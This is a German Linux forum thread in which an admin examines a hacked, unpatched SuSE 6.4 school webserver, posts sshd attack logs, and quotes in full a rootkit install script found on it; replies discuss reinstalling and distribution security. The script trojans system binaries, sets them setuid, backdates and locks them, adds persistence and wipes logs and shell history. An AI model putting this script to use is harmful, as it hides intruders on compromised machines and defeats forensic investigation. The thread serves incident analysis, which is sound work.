PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Gehackter Server



stefaan
11.09.02, 15:59
Servus!

Hab letztens von einem Win-Admin einen Linux-Webserver bekommen, um zu schauen, warum er nicht mehr geht ;)

Vorweg: Es PC-Händler hat einer Schule einen Webserver mit der damals aktuellen Suse 6.4 geliefert, der stand bis jetzt in der Ecke und tat seinen Dienst... Ohne Updates, ohne alles...

Jetzt hab ich ihn mir einmal angeschaut:
Ich kann mich nicht einloggen...
www login: root <enter>
www login:
Und das kommt immer wieder...

Mit Knoppix gebootet, /var/log/messages geschaut:


Jul 24 16:17:00 www sshd[20139]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:05 www sshd[20141]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:08 www sshd[20142]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:10 www sshd[20143]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:15 www sshd[20145]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:18 www sshd[20146]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:23 www sshd[20148]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:26 www sshd[20149]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:29 www sshd[20150]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:31 www sshd[20151]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:17:37 www sshd[20153]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:18:46 www sshd[20180]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:07 www sshd[20193]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:20 www sshd[20195]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:20:58 www sshd[20201]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:13 www sshd[20204]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:18 www sshd[20206]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:21 www sshd[20207]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:34 www sshd[20212]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:54 www sshd[20220]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:21:59 www sshd[20222]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:02 www sshd[20223]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:25 www sshd[20232]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:27 www sshd[20233]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:40 www sshd[20238]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:22:42 www sshd[20239]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:05 www sshd[20248]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:08 www sshd[20249]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:23:11 www sshd[20250]: Disconnecting: Corrupted check bytes on input.
Jul 24 16:23:16 www sshd[20252]: Disconnecting: crc32 compensation attack: network attack detected
Jul 24 16:28:57 www syslogd 1.3-3: restart


Na lieb, der sshd, bei Suse 6.4 Version 1.2.2, wenn ich das richtig gefunden habe...

Im Wurzelverzeichnis hab ich noch eine Datei names kk.tgz gefunden, Google hat allerdings dazu nichts ausgespuckt.
Darin waren 27 Dateien, darunter ein Haufen Programme wie top, netstat, ls, find, du usw...
Hier das "Install-Script":



#!/bin/sh
echo " - Installation ..."

for i in {2,3,4,5}
do
cp -f S80rpcmap /etc/rc.d/rc$i.d/
done
#
mkdir /usr/doc/.spool
mkdir /usr/doc/kern
mkdir /var/log/ssh
#
cd kern
make all
mv string.o /usr/doc/kern/
mv var /usr/doc/kern/
#
cd ../ssh
mv ssh_host_key /var/log/ssh/
mv ssh_random_seed /var/log/ssh
mv squid /usr/doc/.spool/
mv squid.conf /usr/doc/.spool/
#
cd ../utils
mv sniffy sl3y show clear wpe st str.sh /usr/doc/.spool
chattr -i /usr/bin/top > /dev/null 2>&1
touch -acmr /usr/bin/top top
rm -rf /usr/bin/top
mv -f top /usr/bin/top
chmod 4555 /usr/bin/top
#
chattr -i /sbin/syslogd > /dev/null 2>&1
killall -9 syslogd
touch -acmr /sbin/syslogd syslogd
mv -f syslogd /sbin/syslogd
chmod 4555 /sbin/syslogd
#
chattr -i /bin/ls > /dev/null 2>&1
touch -acmr /bin/ls ls
mv -f ls /bin/ls
chmod 4555 /bin/ls
#
chattr -i /bin/netstat > /dev/null 2>&1
mkdir -p /usr/lib/kterm
chattr -i /usr/lib/kterm/.1addr > /dev/null 2>&1
chattr -i /usr/lib/kterm/.1proc > /dev/null 2>&1
mv -f .1addr /usr/lib/kterm
mv -f .1proc /usr/lib/kterm
chattr +i /usr/lib/kterm/.1addr
chattr +i /usr/lib/kterm/.1proc
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
./sz /bin/netstat netstat
mv -f netstat /bin/netstat
mv -f find /usr/bin/find
chmod 4555 /bin/netstat
chmod 4555 /usr/bin/find
#
chattr -i /usr/bin/du > /dev/null 2>&1
touch -acmr /usr/bin/du du
mv -f du /usr/bin/du
chmod 4555 /usr/bin/du
#
chattr -i /usr/src/linux/arch/alpha/lib/.lib/ > /dev/null 2>&1
mkdir -p /usr/src/linux/arch/alpha/lib/.lib/
mv .1file /usr/src/linux/arch/alpha/lib/.lib/
chattr +i /usr/src/linux/arch/alpha/lib/.lib/
chattr +i /usr/bin/top
chattr +i /bin/netstat
chattr +i /usr/bin/find
chattr +i /sbin/syslogd
#
cd ..
./debug
rm -rf S80rpcmap debug kern/ ssh/ utils/ ../r.tgz ../r2.tgz ../rk.tar.gz ../rk.tgz install
cd kern
/usr/doc/kern/var u var.c > /dev/null 2>&1
cd ../..
rm -rf rk
#news
echo "unset HISTFILE">>/etc/profile
rm -f /sbin/rpc.statd /usr/sbin/rpc.statd
rm -rf ~/.bash_history /var/log/xferlog* /var/log/secure* /var/log/lastlog*
echo -e "\n - Gata ! - L-am Facut ! - "


Schaut also ziemlich gehackt aus :D
Leider ist das /var/log/secure weg... /usr wurde auch gelöscht... Gibts sonst noch ein Log, wo die IPs drinnen sein könnten?

Grüße, Stefan

PS: Kommt davon, wenn ein PC-Händler einfach Suse 6.4 draufspielt und vergammeln lässt :D :rolleyes: Und der Typ is Citirix Certified Admin... :rolleyes:

Grüße, Stefan

bernie
11.09.02, 16:03
Hi,

du solltest die Maschine auf jeden Fall neu aufsetzen. Dein Passwort ist jetzt sicher auch irgendwo gespeichert.

Aber sonst find ich das nett :)

Ciao, Bernie

stefaan
11.09.02, 16:12
Servus!

Klar wird da neu aufgesetzt... Oder glaubst du, ich zieh ein Yast-Online-Update rein? :D :D
Und wenn, dann Redhat, nix Suse...

Danke für den Passworthinweis, werd ich weiterleiten...

Übrigens, du kommst ja aus Wien... So gehts bei uns in Mistelbach zu... ;)

Grüße, Stefan

Ulli Ivens
11.09.02, 16:13
So einen Händler kenne ich auch.... der sagt "Never change a running System"

Ist ja eigentlich auch OK, aber Sicherheitsupdates MÜSSEN sein !!

Sonst passiert sowas :ugly:

cyrip
11.09.02, 16:18
tu dir einen gefallen und nimm debian... mit einfachen cronjobs mach das selber updates von allem, was da so drauf ist...

stefaan
11.09.02, 16:21
Servus!

Werde schaun... Hab die 3.0er CDs schon da liegen, habs aber noch nie installiert gehabt... Das soll ja ein Server werden und kein Spielsystem ;)

Aber ich bekomme dieses Wochenende einen neuen (alten) PC zum Testen... mal schaun...

Außerdem: Die Updates bekomme ich ja bezahlt :D

Grüße, Stefan

wilson
11.09.02, 16:30
das cs ist wirklich sehr entzückend!!

und das mein ich ernst

derRichard
11.09.02, 16:31
Original geschrieben von cyrip
tu dir einen gefallen und nimm debian... mit einfachen cronjobs mach das selber updates von allem, was da so drauf ist...

<don't shoot me>

wie währe es mit gentoo?
alle 12 stunden


emerge rsync
emerge -u world
emerge clean

mit cron machen und dein system ist auch immer aktuell...

</don't shoot me>

mfg
richard

darkmoon.2xt.de
11.09.02, 20:24
Übrigens das ganz oben sieht nach einer Art selbstgebasteltem Rootkit aus, könnte das ein Schüler gemacht haben (an fast jeder Schule gibts 1-2 Linuxfreaks) ?

darkmoon.2xt.de

stefaan
11.09.02, 20:29
Servus!

Das bezweifle ich.... Hier handelt es sich um eine Schule, in der Kindergärtnerinnen ausgebildet werden ;)
Außerdem war das mitten in den Ferien...

(Und wenn, dann hätte sich das sicherlich schon unter den Mitschülern herumgesprochen).

Soeben hat mir der "zuständige" Admin mitgeteilt, dass von diesem IP-Bereich jemand belästigt wurde...

Grüße, Stefan

Spike05
11.09.02, 20:29
Original geschrieben von stefaan
Servus!

Werde schaun... Hab die 3.0er CDs schon da liegen, habs aber noch nie installiert gehabt... Das soll ja ein Server werden und kein Spielsystem ;)



Deswegen sollst du ja auch Debian draufhauen, damit es kein Spielsystem wird!!! ;)

So schwer ist die Debian-Installation nur wirklich nicht! (Übrigens sind die Debian-Entwickler gerade heftig dabei einen grafischen Installer zu coden! :) )

cu

Jochen

Peace-on-earth
11.09.02, 21:11
Na, schön. Genau das gleiche Spiel hatte ich mit meinem SuSE-7.3-Server nun auch. Wie wahrscheinlich ist es eigentlich mit einem Linux-System gehackt zu werden? Warum kommt denn SuSE hier so schlecht weg?

Spike05
11.09.02, 21:14
Also wenn man sein System auf dem laufenden hält, dann ist es AFAIK sehr sicher!
Nur gehört halt ein bißchen Arbeit dazu: ständige Information über aktuelle Sicherheistlücken und sofortiges Einspielen der Updates und Patches!

SuSE ist genauso sicher wie sein Anwender! Soll heißen ob es jetzt SuSE, RedHat, Mandrake, Debian, Gentoo oder sonst irgendwas ist, es ist immer der Admin für die Sicherheit zuständig nicht das Betriebssystem!!!

cu

Jochen

Peace-on-earth
11.09.02, 21:30
<<SuSE ist genauso sicher wie sein Anwender!

Na, dann schein ich ja recht unsicher zu sein. Wenn das jetzt meine Freundin wüßte......:cool:

bernie
11.09.02, 21:36
Hi,

nur wenige Systeme bleiben ab den Setup "sicher". Und wenn Netzwerk-Services drauf laufen kannst es gleich vergessen. Irgendwann wird jede Software gehackt (jaja, qmail, tinydns usw nicht ;) ). Der wohl beliebteste Angriffspunkt ist der SSH Daemon. Hatte ich ein paar mal.

Ciao, Bernie

T2chill
13.09.02, 01:46
Original geschrieben von Spike05

..Soll heißen ob es jetzt SuSE, RedHat, Mandrake, Debian, Gentoo oder sonst irgendwas ist, es ist immer der Admin für die Sicherheit zuständig nicht das Betriebssystem...


Naja,also im grunde ist es schon richtig das die sicherheit eines systems am admin liegt....
Jedoch gibt es gewaltige unterschiede in den verschiedenen Distris was das Thema sicherheit
angeht,was widerum bedeutet das die eine mehr arbeit erfordert als die andere
(unmittelbar nach der installation zumindest).SuSE zb ist in einigen punkten schlurriger als andere Distris was das Thema sicherheit angeht.
Debian ist meines erachtens das beste linux ...nicht zuletzt deswegen weil es sehr modular ist.
(vorallem aber auch wegen der tatsache das es ein OS von hacker für hacker ist --> der begriff hacker steht hier für menschen die sich gerne mit computern auseinander setzen und dafür eine gewisse leidenschaft besitzen;))

Zum Topic:
Sieht,in meinen augen,nach nem remote-angriff aus nicht nach local.
Obwohl das script so aussieht wie in eile gewesen :D

Spike05
13.09.02, 08:04
Original geschrieben von T2chill
Naja,also im grunde ist es schon richtig das die sicherheit eines systems am admin liegt....
Jedoch gibt es gewaltige unterschiede in den verschiedenen Distris was das Thema sicherheit
angeht,was widerum bedeutet das die eine mehr arbeit erfordert als die andere
(unmittelbar nach der installation zumindest).SuSE zb ist in einigen punkten schlurriger als andere Distris was das Thema sicherheit angeht.
Debian ist meines erachtens das beste linux ...nicht zuletzt deswegen weil es sehr modular ist.
(vorallem aber auch wegen der tatsache das es ein OS von hacker für hacker ist --> der begriff hacker steht hier für menschen die sich gerne mit computern auseinander setzen und dafür eine gewisse leidenschaft besitzen;))



Da muß ich SuSE jetzt aber mal in Schutz nehmen! Die bringt nämlich von Haus aus eine Firewall mit!!! Bei Debian ist zwar Firestarter am Start, nur als Newbie ist das nicht so leicht rauszufinden, und ich glaube kaum das ein Newbie dazu imstande ist eine Firewall mit Iptables/Ipchains aufzusetzen!

cu

Jochen

T2chill
13.09.02, 18:23
Original geschrieben von Spike05
Da muß ich SuSE jetzt aber mal in Schutz nehmen! Die bringt nämlich von Haus aus eine Firewall mit!!! Bei Debian ist zwar Firestarter am Start, nur als Newbie ist das nicht so leicht rauszufinden, und ich glaube kaum das ein Newbie dazu imstande ist eine Firewall mit Iptables/Ipchains aufzusetzen!


Naja ok das SuSEfirewall2 (iptables-)script ist wirklich nicht schlecht.
Die permissions.paranoid ist auch nicht schlecht.
Obwohl einige setuid zuviel drinn sind um als paranoid durchzugehn :D ...wobei "extenzielle"
dienste wie zb su nicht setuid sind.Die datei permissions.secure ist viel zu lasch.
Ok sowas ist aber auch anpassungssache und im grunde kein wirklicher kritikpunkt.
Was allerdings sehrwohl ein kritikpunkt ist,ist die vergabe von gruppenrechten an neue user.
Standartmäßig wird bei SuSE jeder user in uucp,dialout und user eingetragen.
Sinnvollerweise währe es (gerade für newbies) wenn nur Private gruppen vergeben würden.
Also würde zb user dummy nur in der gruppe dummy sein von Haus aus und nicht
(noch zusätzlich) in den eben genannten.Wobei SuSE noch nichtmal ne private gibt.
Kann man zwar auch anpassen (und yast is auch noch ok im gegensatz zu yast2) aber im
grunde suckt es :(
Für newbies ist SuSE aber aufjedenfall das beste.
Ausserdem ist das lool & feel bei SuSE genial ... :) ... nur das thema sicherheit :(
K,fairerweise muß man dazu auch noch sagen,daß SuSE mitlerweile viel von redhat u.ä
gelernt,abgeschaut,oder wie auch immer,hatt.
Hab auch noch ne SuSE 7.3 aber es kostet viel arbeit nach der installation das
system zu sichern.bei Debian ist es zb einfacher nen gewissen sicherheitsstandart
herzustellen.

Jinto
13.09.02, 18:48
Da muss ich SuSE jetzt auchmal in Schutz nehmen. Die starten Standardmässig so gut wie keine Dienste mehr, was ein absoluter Fortschritt ist.

Harry
13.09.02, 19:33
T2chill,

Deine Behauptungen in allen Ehren, aber irgendwie erinnert mich diese nicht untermauerte Null-Argumentation an Threads auf pro-linux.de oder dem Newsticker auf Heise.

btw: Standardmäßig wird überhaupt kein User mit irgendwelchen Gruppenzugehörigkeiten auf einer SuSE (und auch auf sonstigen Distris) angelegt; das macht immer noch der Admin am System. Und wenn das ein professioneller Admin ist, dann weiß er, dass er Gruppenzugehörigkeiten (auch im YaST2) beliebig definieren kann.
Wenn aber ein "Freizeitadmin" das System verwaltet, dann schützt ihn keine Technik dieser Welt vor sicherheitsrelevanten Fehlkonfigurationen.

Und damit wären wir wieder bei der zentralen Rolle des Admin Know-Hows ...

Harry

T2chill
13.09.02, 20:36
Na danke für die vergleiche mit den Heise Foren uä ...
Standart mäßig wird (zb SuSE7.3) sehr wohl ein user in die genannten gruppen eingetragen.
Ich sagte auch das es nicht schwer ist anzupassen,für newbies aber beinhaltet das ein risiko.

BTW...ich glaube ich habe sehr wohl gründe für meine meinung genannt.Kann mich nicht
erinnern das ich sowas wie "is ******e weil is unsicher" geschrieben hab *lol* o.ä
mal ganz davon abgesehn das ich selber ua SuSE,auf basis von 7.3,als Spiele und Surve
Rechner benutze.

hf